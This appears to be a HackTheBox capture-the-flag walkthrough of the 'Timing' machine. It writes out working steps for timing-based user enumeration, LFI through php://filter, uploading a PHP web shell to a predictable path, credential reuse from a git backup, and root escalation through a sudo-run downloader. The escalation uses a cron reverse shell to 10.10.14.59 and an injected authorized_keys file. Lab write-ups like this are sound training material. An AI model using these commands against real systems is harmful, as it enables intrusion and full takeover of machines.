Timing is a medium rated machine on HackTheBox created by irogir. For the user part we will first abuse a timing attack on the login functionality of a web application. Once logged in we are able to self assign us administrative privileges and abuse a LFI to eventually upload a web shell after reviewing the source code of the application. Using the webshell we find a backup which contains the password for a user to log in via ssh. This user is able to run a custom java application as the root user where we will go into two different ways to abuse this and capture the root flag.

User

As usual we start our enumeration with a nmap scan against all ports, followed by a script and version detection scan against the open ones to get an initial overview of the attack surface.

Nmap

$ sudo nmap -n -p- -T4 10.129.188.245
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-11 21:38 UTC
Nmap scan report for 10.129.188.245
Host is up (0.034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 116.30 seconds

$ sudo nmap -sC -sV -p22,80 10.129.188.245
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-11 21:41 UTC
Nmap scan report for 10.129.188.245
Host is up (0.027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d2:5c:40:d7:c9:fe:ff:a8:83:c3:6e:cd:60:11:d2:eb (RSA)
|   256 18:c9:f7:b9:27:36:a1:16:59:23:35:84:34:31:b3:ad (ECDSA)
|_  256 a2:2d:ee:db:4e:bf:f9:3f:8b:d4:cf:b4:12:d8:20:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Simple WebApp
|_Requested resource was ./login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds

User enumeration

From the two open ports http seems more promising. Opening the page in our browser we get redirected to the login page of Simple WebApp.

Playing around with the login in burp we can see that we have a noticable time difference if we enter admin as the username compared to another one. If this holds true for every valid username we might be able to enumerate users of the application this way.

Using patator we are able to find another valid username aaron.

$ patator http_fuzz 'url=http://10.129.188.245/login.php?login=true' method=POST body='user=FILE0&password=a' 0=/opt/SecLists/Usernames/Names/names.txt  -x ignore:time=0-1
00:44 patator    INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.2 at 2021-12-11 22:00 UTC
00:44 patator    INFO -
00:44 patator    INFO - code size:clen       time | candidate                          |   num | mesg
00:44 patator    INFO - -----------------------------------------------------------------------------
00:45 patator    INFO - 200  6357:5963      1.161 | aaron                              |     4 | HTTP/1.1 200 OK
00:45 patator    INFO - 200  6357:5963      1.161 | admin                              |    86 | HTTP/1.1 200 OK
01:17 patator    INFO - Hits/Done/Skip/Fail/Size: 2/10177/0/0/10177, Avg: 304 r/s, Time: 0h 0m 33s

Trying with the username as password aswell we are able to log into the application.

Access control

We now have access to the Edit Profile feature on the website.

To take a closer look we intercept the request and send it to burp repeater. The response contains a json object with more parameters than we are setting.

Testing if we can set the role parameter which is initially not in the form we are successful.

Webshell

Refreshing the page we now have access to the Admin panel.

Looking at the javascript file handling the upload functionality we find an interesting looking path.

Testing if we can include other files ../ seems to be blocked by a waf but we are successfull using the php wrapper.

$ curl -s 'http://10.129.188.245/image.php?img=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
aaron:x:1000:1000:aaron:/home/aaron:/bin/bash

Looking at the source code of image.php itself we see how the blacklist is implemented. Another interesting thing is that, if we pass the blacklist include is called on the file. This means any php code between the <?php xxx ?> tags will be executed regardless of the file extension.

$curl -s 'http://10.129.189.14/image.php?img=php://filter/convert.base64-encode/resource=image.php' | base64 -d

<?php

function is_safe_include($text)
{
    $blacklist = array("php://input", "phar://", "zip://", "ftp://", "file://", "http://", "data://", "expect://", "https://", "../");

    foreach ($blacklist as $item) {
        if (strpos($text, $item) !== false) {
            return false;
        }
    }
    return substr($text, 0, 1) !== "/";

}

if (isset($_GET['img'])) {
    if (is_safe_include($_GET['img'])) {
        include($_GET['img']);
    } else {
        echo "Hacking attempt detected!";
    }
}

Now we just need to know where the file gets uploaded. This is handled in upload.php so we take a close look at it aswell.

$ curl -s 'http://10.129.188.245/image.php?img=php://filter/convert.base64-encode/resource=upload.php' | base64 -d

At first this looks like more bruteforce work for us than it actually is. Because $file_hash is inside single quotes this means it is just the string literal. This is then hashed with the current time and _ plus the filename get concatenated to the result.

<?php
include("admin_auth_check.php");

$upload_dir = "images/uploads/";

if (!file_exists($upload_dir)) {
    mkdir($upload_dir, 0777, true);
}

$file_hash = uniqid();

$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);
$target_file = $upload_dir . $file_name;
$error = "";
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

if (isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if ($check === false) {
        $error = "Invalid file";
    }
}

// Check if file already exists
if (file_exists($target_file)) {
    $error = "Sorry, file already exists.";
}

if ($imageFileType != "jpg") {
    $error = "This extension is not allowed.";
}

if (empty($error)) {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file has been uploaded.";
    } else {
        echo "Error: There was an error uploading your file.";
    }
} else {
    echo "Error: " . $error;
}
?>

Uploading a simple php reverse shell with the jpg extension we can see the server time, which we need, in repeater.

Next we just have to take the md5sum of $file_hash + the server time in epoch format, add _ and the filename to that.

$ date --date='12/11/2021 23:30:01' +"%s"
1639265401

$ php -a
Interactive mode enabled

php > echo(md5('$file_hash1639265401') . '_shell.php.jpg');
14825a2e927efad4b527cfdfdc212129_shell.php.jpg

Using curl we see the file exists and we have remote code execution on the target.

$ curl 'http://10.129.189.14/image.php?img=images/uploads/14825a2e927efad4b527cfdfdc212129_shell.php.jpg&1=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Credential reuse

There seems to be a firewall on the target which was blocking outbound connection as www-data, however after looking around we quickly find an interesting backup in /opt/.

$ curl -s -XPOST 'http://10.129.188.245/image.php?img=images/uploads/14825a2e927efad4b527cfdfdc212129_shell.php.jpg' -d '1=ls -al /opt'
total 624
drwxr-xr-x  2 root root   4096 Dec  2 11:19 .
drwxr-xr-x 24 root root   4096 Nov 29 01:34 ..
-rw-r--r--  1 root root 627851 Jul 20 22:36 source-files-backup.zip

After transfering and unziping the backup on our machine we see it contains a git repository.

$ curl -s -XPOST 'http://10.129.188.245/image.php?img=images/uploads/14825a2e927efad4b527cfdfdc212129_shell.php.jpg' -d '1=base64 -w0 /opt/source-files-backup.zip' | base64 -d > source-files-backup.zip

There are only two commits in the repo. Diffing them we see another database password.

$ git log
commit 16de2698b5b122c93461298eab730d00273bd83e (HEAD -> master)
Author: grumpy <grumpy@localhost.com>
Date:   Tue Jul 20 22:34:13 2021 +0000

    db_conn updated

commit e4e214696159a25c69812571c8214d2bf8736a3f
Author: grumpy <grumpy@localhost.com>
Date:   Tue Jul 20 22:33:54 2021 +0000

    init

$ git diff 16de2698b5b122c93461298eab730d00273bd83e e4e214696159a25c69812571c8214d2bf8736a3f
diff --git a/db_conn.php b/db_conn.php
index 5397ffa..f1c9217 100644
--- a/db_conn.php
+++ b/db_conn.php
@@ -1,2 +1,2 @@
 <?php
-$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
+$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', 'S3cr3t_unGu3ss4bl3_p422w0Rd');

Testing the older password with our earlier found user aaron against ssh we are able to log into the machine and grab the user flag.

$ ssh aaron@10.129.189.14
The authenticity of host '10.129.189.14 (10.129.189.14)' can't be established.
ECDSA key fingerprint is SHA256:w5P4pFdNqpvCcxxisM5OCJz7a6chyDUrd1JQ14k5smY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.189.14' (ECDSA) to the list of known hosts.
aaron@10.129.189.14's password:
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Dec 11 23:49:21 UTC 2021

  System load:  0.07              Processes:           169
  Usage of /:   48.7% of 4.85GB   Users logged in:     0
  Memory usage: 10%               IP address for eth0: 10.129.189.14
  Swap usage:   0%


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


aaron@timing:~$ wc -c user.txt
33 user.txt

Root

Netutils

Checking for sudo permissions we see that aaron is allowed to run /usr/bin/netutils, which is a bash script that runs a jar located in root’s home directory.

aaron@timing:~$ sudo -l
Matching Defaults entries for aaron on timing:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aaron may run the following commands on timing:
    (ALL) NOPASSWD: /usr/bin/netutils

aaron@timing:~$ file /usr/bin/netutils
/usr/bin/netutils: Bourne-Again shell script, ASCII text executable

aaron@timing:~$ cat /usr/bin/netutils
#! /bin/bash
java -jar /root/netutils.jar

Testing it we can choose between FTP and HTTP. Choosing HTTP prompts us to enter a url.

aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 1
Enter Url:

To test it we first create a file with distinct name and content to be able to find it later again in case it get’s placed somewhere else.

$ echo  lghrkjlhgfdjkghfdkjghdfkjghfd > test_file_12354

We server the file using python and enter the url.

$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Enter Url: 10.10.14.59/test_file_12354
Initializing download: http://10.10.14.59/test_file_12354
File size: 30 bytes
Opening output file test_file_12354
Server unsupported, starting from scratch with one connection.
Starting download


Downloaded 30 byte in 0 seconds. (0.29 KB/s)

netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >>

$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.189.14 - - [11/Dec/2021 23:53:34] "GET /test_file_12354 HTTP/1.0" 200 -
10.129.189.14 - - [11/Dec/2021 23:53:35] "GET /test_file_12354 HTTP/1.0" 200 -

The file got downloaded in our current working directory and is owned by root.

aaron@timing:~$ find / -name test_file_12354 -ls 2>/dev/null
     3152      4 -rw-r--r--   1 root     root           30 Dec 11 23:53 /home/aaron/test_file_12354
aaron@timing:~$ pwd
/home/aaron

Cronjob

One way to abuse this is the fact we have file write as the root user in any directory we are able to cd into. Getting root from here is as simple as creating a cronjob file on our machine that sends a reverse shell back to us.

legit

* * * * *   root    bash -c 'bash -i >&/dev/tcp/10.10.14.59/7575 0>&1'

Now we just have to set up our listener.

$ nc -lnvp 7575
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::7575
Ncat: Listening on 0.0.0.0:7575

Cd into /etc/cron.d/ and download the cronjob using /usr/bin/netutils.

aaron@timing:~$ cd /etc/cron.d
aaron@timing:/etc/cron.d$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 1
Enter Url: http://10.10.14.59/legit
Initializing download: http://10.10.14.59/legit
File size: 71 bytes
Opening output file legit
Server unsupported, starting from scratch with one connection.
Starting download


Downloaded 71 byte in 0 seconds. (0.69 KB/s)

netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> ^C

After about a minute later we get a connection on our listener as the root user.

$ nc -lnvp 7575
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::7575
Ncat: Listening on 0.0.0.0:7575
Ncat: Connection from 10.129.189.14.
Ncat: Connection from 10.129.189.14:48750.
bash: cannot set terminal process group (7414): Inappropriate ioctl for device
bash: no job control in this shell
root@timing:~# wc -c /root/root.txt
wc -c /root/root.txt
33 /root/root.txt
root@timing:~#

Axelrc

After checking the useragent of the downloader we see that it is User-Agent': 'Axel/2.16.1 (Linux). Another way to abuse this is the .axelrc file. In this file we are able to specify a default filename for downloaded files. This applies in cases where the url does not contain a filename. First we create an .axelrc in aaron’s home directory.

aaron@timing:~$ cat .axelrc
default_filename = /root/.ssh/authorized_keys

Then we create a ssh keypair moving the public key to index.html.

cp ../root.pub index.html

Next we serve the public key with a python webserver and initiate the download without a filepath.

$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 1
Enter Url: http://10.10.14.59
Initializing download: http://10.10.14.59
File size: 565 bytes
Opening output file /root/.ssh/authorized_keys
Server unsupported, starting from scratch with one connection.
Starting download


Downloaded 565 byte in 0 seconds. (5.50 KB/s)

netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >>

This leads to index.html getting downloaded and saved as /root/.ssh/authorized_keys.

$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.189.14 - - [12/Dec/2021 00:02:56] "GET / HTTP/1.0" 200 -
10.129.189.14 - - [12/Dec/2021 00:02:56] "GET / HTTP/1.0" 200 -

Now we can simply ssh into the machine as the root user.

$ ssh -i root root@10.129.189.14
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Dec 12 00:02:59 UTC 2021

  System load:  0.0               Processes:           180
  Usage of /:   48.7% of 4.85GB   Users logged in:     1
  Memory usage: 13%               IP address for eth0: 10.129.189.14
  Swap usage:   0%


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Dec 12 00:02:16 2021 from 10.10.14.59
root@timing:~#